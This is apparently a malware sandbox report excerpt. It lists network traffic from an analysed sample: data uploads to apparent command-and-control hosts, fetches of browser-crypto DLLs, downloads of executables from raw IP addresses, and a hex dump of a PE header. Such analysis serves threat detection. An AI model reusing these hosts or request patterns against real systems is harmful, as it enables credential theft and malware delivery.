Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 26 May 2024 08:30:57 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 26 May 2024 08:26:18 GMTETag: "205e00-6195727a15e80"Accept-Ranges: bytesContent-Length: 2121216Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 0a 09 00 00 50 17 00 00 00 00 00 1c 18 09 00 00 10 00 00 00 20 09 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 20 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 4a 22 00 00 00 70 0a 00 00 44 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 09 00 3c bd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 09 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 84 08 09 00 00 10 00 00 00 0a 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 c4 26 00 00 00 20 09 00 00 28 00 00 00 0e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 2d 0d 00 00 00 50 09 00 00 00 00 00 00 36 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 4a 22 00 00 00 60 09 00 00 24 00 00 00 36 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 90 09 00 00 00 00 00 00 5a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 a0 09 00 00 02 00 00 00 5a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 3c bd 00 00 00 b0 09 00 00 be 00 00 00 5c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 44 16 00 00 70 0a 00 00 44 16 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 20 00 00 00 00 00 00 5e 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic

HTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View

IP Address: 190.187.52.42 190.187.52.42

Source: Joe Sandbox View	ASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
Source: Joe Sandbox View	ASN Name: AMERICATELPERUSAPE AMERICATELPERUSAPE
Source: Joe Sandbox View	ASN Name: AKAMAI-ASN1EU AKAMAI-ASN1EU
Source: Joe Sandbox View	ASN Name: TTNETTR TTNETTR
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12830Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15072Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20562Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7083Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1229Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 583478Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCBGCAFIIECBFIDHIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFCGIJDAFBKFIECBGCAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKEBFCFIJJKKECAKJEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAFCAKEHDHDHIDHDGDHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 5557Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHIDHJDBFIIECAKECBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBAKEGIDBGIEBFHDHJJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAEBKEGHJKEBFHJDBFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFHJDAEHIEHJJKFBGDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAFHDHCBGDGCBGCGIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGHCFIDAKJEBGCAFBAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFCGIJDAFBKFIECBGCAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBAEHCAEGDHJKFHJKFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 129597Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCFBFBAEBKJKEBGCAEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jcnkksjnacxjwh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://eaaqpotuqgvxxvep.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://eskqecavndurqirx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 252Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pvhxcowxrsmsmxv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 352Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xhkcnscxetvodwbe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 329Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wmdyxmgpkfrir.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: dbfhns.in
Source: global traffic	HTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qsvttmlmwckhyv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fmxjggdvslwul.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dsnbbvyutqhm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://alfdwfnhtcwp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: dbfhns.in
Source: global traffic	HTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
Source: global traffic	HTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://utrnyeeydifgj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kyidhbcjdpvriid.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 342Host: dbfhns.in
Source: global traffic	HTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cqkwdxujhjkjfbp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ahlpadnysdsadbk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mqdfdnedidrxaed.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mdrbuklfbrraj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xmvygvmqskvs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://efeegeullncj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 290Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bduckycvwfnemtxt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ejfrahknvjij.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qmlyvkkabycy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ddteakwbikxqkc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ovxmwniqpjexkcks.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qvvhbwqetcr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://umfomwabnghpfpsy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://frlbymqtkyyc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bmuwkpviysjlmpaf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://olwhnfqjomykugd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sgvkxotchkel.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oosdileuucnskppc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://caudwrxwdlvda.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: dbfhns.in

Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86

Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp

Code function: 9_2_6CC9CC60 PR_Recv,

9_2_6CC9CC60

Source: global traffic	HTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
